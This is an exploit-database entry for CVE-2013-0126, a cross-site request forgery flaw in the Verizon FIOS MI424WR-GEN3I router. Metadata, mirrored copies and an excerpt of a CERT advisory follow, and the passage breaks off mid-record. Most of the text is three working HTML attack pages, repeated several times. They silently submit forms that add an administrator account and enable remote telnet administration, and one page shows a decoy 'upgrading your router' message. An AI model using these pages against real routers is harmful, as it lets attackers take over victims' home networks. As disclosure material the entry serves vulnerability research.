ID 1337DAY-ID-20527
Type zdt
Reporter Jacob Holcomb
Modified 2013-03-19T00:00:00
Description
Advisory/Video: http://infosec42.blogspot.com/2013/03/verizon-fios-router-csrf-cve-2013-0126.html
US CERT Disclosure: http://www.kb.cert.org/vuls/id/278204
Exploit Code:
HTML FILE #1
<html>
<title>Cisco Verizon FIOS CSRF - Adding Administrator User</title>
<!--Cisco Model: MI424WR-GEN3I -->
<!--Firmware Version: 40.19.36 -->
<h1>Please sit tight while we upgrade your router</h1>
<body>
<form name="verizonCisco" action="http://192.168.1.1/index.cgi" method="post">
<input type="hidden" name="active_page" value="101"/>
<input type="hidden" name="page_title" value="User Settings"/>
<input type="hidden" name="mimic_button_field" value="submit_button_submit: .."/>
<input type="hidden" name="button_value" value="."/>
<input type="hidden" name="strip_page_top" value="0"/>
<input type="hidden" name="user_id" value="-1"/>
<input type="hidden" name="fullname_defval" value=""/>
<input type="hidden" name="fullname" value="g42"/>
<input type="hidden" name="username_defval" value=""/>
<input type="hidden" name="username" value="G42"/>
<input type="hidden" name="user_level" value="2"/>
<input type="hidden" name="email_system_notify_level" value="15"/>
<input type="hidden" name="email_security_notify_level" value="15"/>
</form>
<script>
function CSRF1() {window.open("http://10.0.1.101/verizonFIOS2.html");};window.setTimeout(CSRF1,1000)
function CSRF2() {document.verizonCisco.submit();};window.setTimeout(CSRF2,1000)
</script>
</body>
</html>
HTML FILE #2
<html>
<title>Cisco Verizon FIOS CSRF2 - Add User w/ No Pass Confirmation</title>
<body>
<form name="verizonCiscoC" action="http://192.168.1.1/index.cgi" method="post">
<input type="hidden" name="active_page" value="101"/>
<input type="hidden" name="page_title" value="User Settings"/>
<input type="hidden" name="mimic_button_field" value="submit_button_confirm_submit: .."/>
<input type="hidden" name="button_value" value="."/>
<input type="hidden" name="strip_page_top" value="0"/>
</form>
<script>
function CSRF1() {window.open("http://10.0.1.101/verizonFIOS3.html");};window.setTimeout(CSRF1,0500)
function CSRF2() {document.verizonCiscoC.submit();};window.setTimeout(CSRF2,0500)
</script>
</body>
</html>
HTML FILE #3
<html>
<title>Cisco Verizon FIOS CSRF3 - Enable Remote Administration</title>
<body>
<form name="verizonCiscoRemote" action="http://192.168.1.1/index.cgi" method="post">
<input type="hidden" name="active_page" value="9078"/>
<input type="hidden" name="active_page_str" value="page_remote_admin"/>
<input type="hidden" name="page_title" value="Remote Administration"/>
<input type="hidden" name="mimic_button_field" value="submit_button_submit: .."/>
<input type="hidden" name="button_value" value=""/>
<input type="hidden" name="strip_page_top" value="0"/>
<input type="hidden" name="is_telnet_primary" value="1"/>
<input type="hidden" name="is_telnet_primary_defval" value="0"/>
<input type="hidden" name="is_telnet_secondary_defval" value="0"/>
<input type="hidden" name="is_telnet_ssl_defval" value="0"/>
<input type="hidden" name="is_http_primary_defval" value="0"/>
<input type="hidden" name="is_http_secondary_defval" value="0"/>
<input type="hidden" name="is_https_primary_defval" value="0"/>
<input type="hidden" name="is_https_secondary_defval" value="0"/>
<input type="hidden" name="is_diagnostics_icmp_defval" value="0"/>
<input type="hidden" name="is_diagnostics_traceroute_defval" value="0"/>
<input type="hidden" name="is_telnet_secondary" value="1"/>
</form>
<script>
function CSRF1() {document.verizonCiscoRemote.submit();};window.setTimeout(CSRF1,0000)
</script>
</body>
</html>
# 0day.today [2018-03-28] #
{"hash": "506cded81adbade10280b8e17a7d98cf6e7a6d6caf0ba66ec6391d0bbd23fac5", "id": "1337DAY-ID-20527", "lastseen": "2018-03-28T03:22:05", "viewCount": 12, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "8b5d0d8cc30b20fa709b5b6b868dc203", "key": "cvelist"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "c28357326906695c780d7d594d4ded3f", "key": "description"}, {"hash": "e800dd4914a08841b8b12421a500fbd5", "key": "href"}, {"hash": "16b14757497194f5e0d23e1b9ce47c6b", "key": "modified"}, {"hash": "16b14757497194f5e0d23e1b9ce47c6b", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "fa253720cd589555dc8773efd677be5e", "key": "reporter"}, {"hash": "145f3a0906114990572e95dd9caf38f8", "key": "sourceData"}, {"hash": "d7e353c6c87065a43a921f616984b025", "key": "sourceHref"}, {"hash": "a68900fae06ca575f7241bf0d00e43cf", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 2, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2018-03-28T03:22:05"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-0126"]}, {"type": "seebug", "idList": ["SSV:78547"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120869"]}, {"type": "cert", "idList": ["VU:278204"]}, {"type": "zdt", "idList": ["1337DAY-ID-20537"]}, {"type": "exploitdb", "idList": ["EDB-ID:24860"]}], "modified": "2018-03-28T03:22:05"}, "vulnersScore": 6.7}, "type": "zdt", "sourceHref": "https://0day.today/exploit/20527", "description": "Advisory/Video: http://infosec42.blogspot.com/2013/03/verizon-fios-router-csrf-cve-2013-0126.html", "title": "Verizon Fios Router MI424WR-GEN3I - CSRF Vulnerability", "history": [{"bulletin": {"hash": "556c7538d2f60e481b2498e782ce639dea4db20ebff6e02e82e8e39cb9710a6a", "id": "1337DAY-ID-20527", "lastseen": "2016-04-20T02:12:44", "enchantments": {"score": {"value": 0.0, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:N/", "modified": "2016-04-20T02:12:44"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "16b14757497194f5e0d23e1b9ce47c6b", "key": "published"}, {"hash": "a68900fae06ca575f7241bf0d00e43cf", "key": "title"}, {"hash": "471a0066db6e967991c4c95da0eb5020", "key": "sourceHref"}, {"hash": "c28357326906695c780d7d594d4ded3f", "key": "description"}, {"hash": "3da40e1c86c3e5f825532db41b60edb1", "key": "sourceData"}, {"hash": "8b5d0d8cc30b20fa709b5b6b868dc203", "key": "cvelist"}, {"hash": "fa253720cd589555dc8773efd677be5e", "key": "reporter"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "16b14757497194f5e0d23e1b9ce47c6b", "key": "modified"}, {"hash": "84b362d7117dcbe238e8935f96297b73", "key": "href"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/20527", "description": "Advisory/Video: http://infosec42.blogspot.com/2013/03/verizon-fios-router-csrf-cve-2013-0126.html", "viewCount": 4, "title": "Verizon Fios Router MI424WR-GEN3I - CSRF Vulnerability", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "objectVersion": "1.0", "cvelist": ["CVE-2013-0126"], "sourceData": "US CERT Disclosure: http://www.kb.cert.org/vuls/id/278204\r\n \r\nExploit Code:\r\n \r\nHTML FILE #1\r\n \r\n<html>\r\n<title>Cisco Verizon FIOS CSRF - Adding Administrator User</title>\r\n<!--Cisco Model: MI424WR-GEN3I -->\r\n<!--Firmware Version: 40.19.36 -->\r\n<h1>Please sit tight while we upgrade your router</h1>\r\n \r\n<body>\r\n \r\n<form name=\"verizonCisco\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"101\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"User Settings\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\".\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"user_id\" value=\"-1\"/>\r\n<input type=\"hidden\" name=\"fullname_defval\" value=\"\"/>\r\n<input type=\"hidden\" name=\"fullname\" value=\"g42\"/>\r\n<input type=\"hidden\" name=\"username_defval\" value=\"\"/>\r\n<input type=\"hidden\" name=\"username\" value=\"G42\"/>\r\n<input type=\"hidden\" name=\"user_level\" value=\"2\"/>\r\n<input type=\"hidden\" name=\"email_system_notify_level\" value=\"15\"/>\r\n<input type=\"hidden\" name=\"email_security_notify_level\" value=\"15\"/>\r\n</form>\r\n \r\n<script>\r\nfunction CSRF1() {window.open(\"http://10.0.1.101/verizonFIOS2.html\");};window.setTimeout(CSRF1,1000)\r\nfunction CSRF2() {document.verizonCisco.submit();};window.setTimeout(CSRF2,1000)\r\n</script>\r\n \r\n</body>\r\n</html>\r\n \r\nHTML FILE #2\r\n \r\n<html>\r\n<title>Cisco Verizon FIOS CSRF2 - Add User w/ No Pass Confirmation</title>\r\n \r\n<body>\r\n \r\n<form name=\"verizonCiscoC\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"101\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"User Settings\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_confirm_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\".\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n</form>\r\n \r\n<script>\r\nfunction CSRF1() {window.open(\"http://10.0.1.101/verizonFIOS3.html\");};window.setTimeout(CSRF1,0500)\r\nfunction CSRF2() {document.verizonCiscoC.submit();};window.setTimeout(CSRF2,0500)\r\n</script>\r\n \r\n</body>\r\n</html>\r\n \r\nHTML FILE #3\r\n \r\n <html>\r\n<title>Cisco Verizon FIOS CSRF3 - Enable Remote Administration</title>\r\n \r\n<body>\r\n \r\n<form name=\"verizonCiscoRemote\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"9078\"/>\r\n<input type=\"hidden\" name=\"active_page_str\" value=\"page_remote_admin\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"Remote Administration\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\"\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_primary\" value=\"1\"/>\r\n<input type=\"hidden\" name=\"is_telnet_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_ssl_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_http_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_http_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_https_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_https_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_diagnostics_icmp_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_diagnostics_traceroute_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_secondary\" value=\"1\"/>\r\n</form>\r\n \r\n<script>\r\nfunction CSRF1() {document.verizonCiscoRemote.submit();};window.setTimeout(CSRF1,0000)\r\n</script>\r\n \r\n</body>\r\n</html>\n\n# 0day.today [2016-04-20] #", "published": "2013-03-19T00:00:00", "references": [], "reporter": "Jacob Holcomb", "modified": "2013-03-19T00:00:00", "href": "http://0day.today/exploit/description/20527"}, "lastseen": "2016-04-20T02:12:44", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": ["CVE-2013-0126"], "sourceData": "US CERT Disclosure: http://www.kb.cert.org/vuls/id/278204\r\n \r\nExploit Code:\r\n \r\nHTML FILE #1\r\n \r\n<html>\r\n<title>Cisco Verizon FIOS CSRF - Adding Administrator User</title>\r\n<!--Cisco Model: MI424WR-GEN3I -->\r\n<!--Firmware Version: 40.19.36 -->\r\n<h1>Please sit tight while we upgrade your router</h1>\r\n \r\n<body>\r\n \r\n<form name=\"verizonCisco\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"101\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"User Settings\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\".\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"user_id\" value=\"-1\"/>\r\n<input type=\"hidden\" name=\"fullname_defval\" value=\"\"/>\r\n<input type=\"hidden\" name=\"fullname\" value=\"g42\"/>\r\n<input type=\"hidden\" name=\"username_defval\" value=\"\"/>\r\n<input type=\"hidden\" name=\"username\" value=\"G42\"/>\r\n<input type=\"hidden\" name=\"user_level\" value=\"2\"/>\r\n<input type=\"hidden\" name=\"email_system_notify_level\" value=\"15\"/>\r\n<input type=\"hidden\" name=\"email_security_notify_level\" value=\"15\"/>\r\n</form>\r\n \r\n<script>\r\nfunction CSRF1() {window.open(\"http://10.0.1.101/verizonFIOS2.html\");};window.setTimeout(CSRF1,1000)\r\nfunction CSRF2() {document.verizonCisco.submit();};window.setTimeout(CSRF2,1000)\r\n</script>\r\n \r\n</body>\r\n</html>\r\n \r\nHTML FILE #2\r\n \r\n<html>\r\n<title>Cisco Verizon FIOS CSRF2 - Add User w/ No Pass Confirmation</title>\r\n \r\n<body>\r\n \r\n<form name=\"verizonCiscoC\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"101\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"User Settings\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_confirm_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\".\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n</form>\r\n \r\n<script>\r\nfunction CSRF1() {window.open(\"http://10.0.1.101/verizonFIOS3.html\");};window.setTimeout(CSRF1,0500)\r\nfunction CSRF2() {document.verizonCiscoC.submit();};window.setTimeout(CSRF2,0500)\r\n</script>\r\n \r\n</body>\r\n</html>\r\n \r\nHTML FILE #3\r\n \r\n <html>\r\n<title>Cisco Verizon FIOS CSRF3 - Enable Remote Administration</title>\r\n \r\n<body>\r\n \r\n<form name=\"verizonCiscoRemote\" action=\"http://192.168.1.1/index.cgi\" method=\"post\">\r\n<input type=\"hidden\" name=\"active_page\" value=\"9078\"/>\r\n<input type=\"hidden\" name=\"active_page_str\" value=\"page_remote_admin\"/>\r\n<input type=\"hidden\" name=\"page_title\" value=\"Remote Administration\"/>\r\n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_submit: ..\"/>\r\n<input type=\"hidden\" name=\"button_value\" value=\"\"/>\r\n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_primary\" value=\"1\"/>\r\n<input type=\"hidden\" name=\"is_telnet_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_ssl_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_http_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_http_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_https_primary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_https_secondary_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_diagnostics_icmp_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_diagnostics_traceroute_defval\" value=\"0\"/>\r\n<input type=\"hidden\" name=\"is_telnet_secondary\" value=\"1\"/>\r\n</form>\r\n \r\n<script>\r\nfunction CSRF1() {document.verizonCiscoRemote.submit();};window.setTimeout(CSRF1,0000)\r\n</script>\r\n \r\n</body>\r\n</html>\n\n# 0day.today [2018-03-28] #", "published": "2013-03-19T00:00:00", "references": [], "reporter": "Jacob Holcomb", "modified": "2013-03-19T00:00:00", "href": "https://0day.today/exploit/description/20527"}
{"cve": [{"lastseen": "2019-05-29T18:12:59", "bulletinFamily": "NVD", "description": "Multiple cross-site request forgery (CSRF) vulnerabilities in index.cgi on the Verizon FIOS Actiontec MI424WR-GEN3I router with firmware 40.19.36 allow remote attackers to hijack the authentication of administrators for requests that (1) add administrative accounts via the username and user_level parameters or (2) enable remote administration via the is_telnet_primary and is_telnet_secondary parameters.", "modified": "2013-10-07T20:31:00", "id": "CVE-2013-0126", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0126", "published": "2013-03-21T20:55:00", "title": "CVE-2013-0126", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T16:45:44", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-78547", "id": "SSV:78547", "title": "Verizon Fios Router MI424WR-GEN3I - CSRF Vulnerability", "type": "seebug", "sourceData": "\n # Exploit Title: Verizon Fios Router CSRF Admin Shell \r\n# Date: Discovered and reported January 2013\r\n# Author: Jacob Holcomb/Gimppy - Security Analyst @ Independent Security Evaluators\r\n# Software: Verizon FIOS Router - Firmware 40.19.36 (http://verizon.com)\r\n# CVE: CVE-2013-0126\r\n# Advisory/Video: http://infosec42.blogspot.com/2013/03/verizon-fios-router-csrf-cve-2013-0126.html\r\n\r\nUS CERT Disclosure: http://www.kb.cert.org/vuls/id/278204\r\n\r\nExploit Code:\r\n\r\nHTML FILE #1\r\n\r\n<html>\r\n<title>Cisco Verizon FIOS CSRF - Adding Administrator User</title>\r\n<!--Cisco Model: MI424WR-GEN3I -->\r\n<!--Firmware Version: 40.19.36 -->\r\n<h1>Please sit tight while we upgrade your router</h1>\r\n\r\n<body>\r\n\r\n<form name="verizonCisco" action="http://192.168.1.1/index.cgi" method="post">\r\n<input type="hidden" name="active_page" value="101"/>\r\n<input type="hidden" name="page_title" value="User Settings"/>\r\n<input type="hidden" name="mimic_button_field" value="submit_button_submit: .."/>\r\n<input type="hidden" name="button_value" value="."/>\r\n<input type="hidden" name="strip_page_top" value="0"/>\r\n<input type="hidden" name="user_id" value="-1"/>\r\n<input type="hidden" name="fullname_defval" value=""/>\r\n<input type="hidden" name="fullname" value="g42"/>\r\n<input type="hidden" name="username_defval" value=""/>\r\n<input type="hidden" name="username" value="G42"/>\r\n<input type="hidden" name="user_level" value="2"/>\r\n<input type="hidden" name="email_system_notify_level" value="15"/>\r\n<input type="hidden" name="email_security_notify_level" value="15"/>\r\n</form>\r\n\r\n<script>\r\nfunction CSRF1() {window.open("http://10.0.1.101/verizonFIOS2.html");};window.setTimeout(CSRF1,1000)\r\nfunction CSRF2() {document.verizonCisco.submit();};window.setTimeout(CSRF2,1000)\r\n</script>\r\n\r\n</body>\r\n</html>\r\n\r\nHTML FILE #2\r\n\r\n<html>\r\n<title>Cisco Verizon FIOS CSRF2 - Add User w/ No Pass Confirmation</title>\r\n\r\n<body>\r\n\r\n<form name="verizonCiscoC" action="http://192.168.1.1/index.cgi" method="post">\r\n<input type="hidden" name="active_page" value="101"/>\r\n<input type="hidden" name="page_title" value="User Settings"/>\r\n<input type="hidden" name="mimic_button_field" value="submit_button_confirm_submit: .."/>\r\n<input type="hidden" name="button_value" value="."/>\r\n<input type="hidden" name="strip_page_top" value="0"/>\r\n</form>\r\n\r\n<script>\r\nfunction CSRF1() {window.open("http://10.0.1.101/verizonFIOS3.html");};window.setTimeout(CSRF1,0500)\r\nfunction CSRF2() {document.verizonCiscoC.submit();};window.setTimeout(CSRF2,0500)\r\n</script>\r\n\r\n</body>\r\n</html>\r\n\r\nHTML FILE #3\r\n\r\n <html>\r\n<title>Cisco Verizon FIOS CSRF3 - Enable Remote Administration</title>\r\n\r\n<body>\r\n\r\n<form name="verizonCiscoRemote" action="http://192.168.1.1/index.cgi" method="post">\r\n<input type="hidden" name="active_page" value="9078"/>\r\n<input type="hidden" name="active_page_str" value="page_remote_admin"/>\r\n<input type="hidden" name="page_title" value="Remote Administration"/>\r\n<input type="hidden" name="mimic_button_field" value="submit_button_submit: .."/>\r\n<input type="hidden" name="button_value" value=""/>\r\n<input type="hidden" name="strip_page_top" value="0"/>\r\n<input type="hidden" name="is_telnet_primary" value="1"/>\r\n<input type="hidden" name="is_telnet_primary_defval" value="0"/>\r\n<input type="hidden" name="is_telnet_secondary_defval" value="0"/>\r\n<input type="hidden" name="is_telnet_ssl_defval" value="0"/>\r\n<input type="hidden" name="is_http_primary_defval" value="0"/>\r\n<input type="hidden" name="is_http_secondary_defval" value="0"/>\r\n<input type="hidden" name="is_https_primary_defval" value="0"/>\r\n<input type="hidden" name="is_https_secondary_defval" value="0"/>\r\n<input type="hidden" name="is_diagnostics_icmp_defval" value="0"/>\r\n<input type="hidden" name="is_diagnostics_traceroute_defval" value="0"/>\r\n<input type="hidden" name="is_telnet_secondary" value="1"/>\r\n</form>\r\n\r\n<script>\r\nfunction CSRF1() {document.verizonCiscoRemote.submit();};window.setTimeout(CSRF1,0000)\r\n</script>\r\n\r\n</body>\r\n</html>\r\n\n ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-78547"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:57", "bulletinFamily": "exploit", "description": "", "modified": "2013-03-19T00:00:00", "published": "2013-03-19T00:00:00", "href": "https://packetstormsecurity.com/files/120869/Verizon-Fios-Router-MI424WR-GEN3I-CSRF.html", "id": "PACKETSTORM:120869", "type": "packetstorm", "title": "Verizon Fios Router MI424WR-GEN3I CSRF", "sourceData": "`# Exploit Title: Verizon Fios Router CSRF Admin Shell \n# Date: Discovered and reported January 2013 \n# Author: Jacob Holcomb/Gimppy - Security Analyst @ Independent Security Evaluators \n# Software: Verizon FIOS Router - Firmware 40.19.36 (http://verizon.com) \n# CVE: CVE-2013-0126 \n# Advisory/Video: http://infosec42.blogspot.com/2013/03/verizon-fios-router-csrf-cve-2013-0126.html \n \nUS CERT Disclosure: http://www.kb.cert.org/vuls/id/278204 \n \nExploit Code: \n \nHTML FILE #1 \n \n<html> \n<title>Cisco Verizon FIOS CSRF - Adding Administrator User</title> \n<!--Cisco Model: MI424WR-GEN3I --> \n<!--Firmware Version: 40.19.36 --> \n<h1>Please sit tight while we upgrade your router</h1> \n \n<body> \n \n<form name=\"verizonCisco\" action=\"http://192.168.1.1/index.cgi\" method=\"post\"> \n<input type=\"hidden\" name=\"active_page\" value=\"101\"/> \n<input type=\"hidden\" name=\"page_title\" value=\"User Settings\"/> \n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_submit: ..\"/> \n<input type=\"hidden\" name=\"button_value\" value=\".\"/> \n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/> \n<input type=\"hidden\" name=\"user_id\" value=\"-1\"/> \n<input type=\"hidden\" name=\"fullname_defval\" value=\"\"/> \n<input type=\"hidden\" name=\"fullname\" value=\"g42\"/> \n<input type=\"hidden\" name=\"username_defval\" value=\"\"/> \n<input type=\"hidden\" name=\"username\" value=\"G42\"/> \n<input type=\"hidden\" name=\"user_level\" value=\"2\"/> \n<input type=\"hidden\" name=\"email_system_notify_level\" value=\"15\"/> \n<input type=\"hidden\" name=\"email_security_notify_level\" value=\"15\"/> \n</form> \n \n<script> \nfunction CSRF1() {window.open(\"http://10.0.1.101/verizonFIOS2.html\");};window.setTimeout(CSRF1,1000) \nfunction CSRF2() {document.verizonCisco.submit();};window.setTimeout(CSRF2,1000) \n</script> \n \n</body> \n</html> \n \nHTML FILE #2 \n \n<html> \n<title>Cisco Verizon FIOS CSRF2 - Add User w/ No Pass Confirmation</title> \n \n<body> \n \n<form name=\"verizonCiscoC\" action=\"http://192.168.1.1/index.cgi\" method=\"post\"> \n<input type=\"hidden\" name=\"active_page\" value=\"101\"/> \n<input type=\"hidden\" name=\"page_title\" value=\"User Settings\"/> \n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_confirm_submit: ..\"/> \n<input type=\"hidden\" name=\"button_value\" value=\".\"/> \n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/> \n</form> \n \n<script> \nfunction CSRF1() {window.open(\"http://10.0.1.101/verizonFIOS3.html\");};window.setTimeout(CSRF1,0500) \nfunction CSRF2() {document.verizonCiscoC.submit();};window.setTimeout(CSRF2,0500) \n</script> \n \n</body> \n</html> \n \nHTML FILE #3 \n \n<html> \n<title>Cisco Verizon FIOS CSRF3 - Enable Remote Administration</title> \n \n<body> \n \n<form name=\"verizonCiscoRemote\" action=\"http://192.168.1.1/index.cgi\" method=\"post\"> \n<input type=\"hidden\" name=\"active_page\" value=\"9078\"/> \n<input type=\"hidden\" name=\"active_page_str\" value=\"page_remote_admin\"/> \n<input type=\"hidden\" name=\"page_title\" value=\"Remote Administration\"/> \n<input type=\"hidden\" name=\"mimic_button_field\" value=\"submit_button_submit: ..\"/> \n<input type=\"hidden\" name=\"button_value\" value=\"\"/> \n<input type=\"hidden\" name=\"strip_page_top\" value=\"0\"/> \n<input type=\"hidden\" name=\"is_telnet_primary\" value=\"1\"/> \n<input type=\"hidden\" name=\"is_telnet_primary_defval\" value=\"0\"/> \n<input type=\"hidden\" name=\"is_telnet_secondary_defval\" value=\"0\"/> \n<input type=\"hidden\" name=\"is_telnet_ssl_defval\" value=\"0\"/> \n<input type=\"hidden\" name=\"is_http_primary_defval\" value=\"0\"/> \n<input type=\"hidden\" name=\"is_http_secondary_defval\" value=\"0\"/> \n<input type=\"hidden\" name=\"is_https_primary_defval\" value=\"0\"/> \n<input type=\"hidden\" name=\"is_https_secondary_defval\" value=\"0\"/> \n<input type=\"hidden\" name=\"is_diagnostics_icmp_defval\" value=\"0\"/> \n<input type=\"hidden\" name=\"is_diagnostics_traceroute_defval\" value=\"0\"/> \n<input type=\"hidden\" name=\"is_telnet_secondary\" value=\"1\"/> \n</form> \n \n<script> \nfunction CSRF1() {document.verizonCiscoRemote.submit();};window.setTimeout(CSRF1,0000) \n</script> \n \n</body> \n</html> \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/120869/verizonfios-xsrf.txt"}], "cert": [{"lastseen": "2019-10-09T19:49:40", "bulletinFamily": "info", "description": "### Overview \n\nThe Verizon FIOS Actiontec router model MI424WR-GEN3I is susceptible to cross-site request forgery attacks. ([CWE-352](<http://cwe.mitre.org/data/definitions/352.html>))\n\n### Description \n\nThe Verizon FIOS Actiontec router model MI424WR-GEN3I is susceptible to cross-site request forgery attacks. ([CWE-352](<http://cwe.mitre.org/data/definitions/352.html>)) A remote attacker that is able to trick a user into clicking a malicious link while logged into the router may be able to compromise the router. \n \n--- \n \n### Impact \n\nA remote unauthenticated attacker that is able to trick a user into clicking a malicious link while they are logged into the router may be able to compromise the router. \n \n--- \n \n### Solution \n\nWe are currently unaware of a practical solution to this problem. Please consider the following workarounds. \n \n--- \n \n**Restrict Access**\n\nVerify the router's web interface is not Internet accessible. As a general good security practice, only allow connections from trusted hosts and networks. Note that restricting access does not prevent CSRF attacks since the attack comes as an HTTP request from a legitimate user's host. Restricting access would prevent an attacker from accessing the router web interface using stolen credentials from a blocked network location. \n \n**Do Not Stay Logged Into the Router's Management Interface** \n \nAlways log out of the router's management interface when done using it. \n \n--- \n \n### Vendor Information\n\n278204\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Verizon\n\nNotified: February 01, 2013 Updated: March 18, 2013 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 6.8 | AV:N/AC:M/Au:N/C:P/I:P/A:P \nTemporal | 5.5 | E:POC/RL:W/RC:UR \nEnvironmental | 4.2 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://infosec42.blogspot.com/2013/03/verizon-fios-router-csrf-cve-2013-0126.html>\n * <http://cwe.mitre.org/data/definitions/352.html>\n\n### Acknowledgements\n\nThanks to Jacob Holcomb of Independent Security Evaluators for reporting this vulnerability.\n\nThis document was written by Jared Allar.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2013-0126](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0126>) \n---|--- \n**Date Public:** | 2013-03-18 \n**Date First Published:** | 2013-03-18 \n**Date Last Updated: ** | 2013-12-05 21:34 UTC \n**Document Revision: ** | 21 \n", "modified": "2013-12-05T21:34:00", "published": 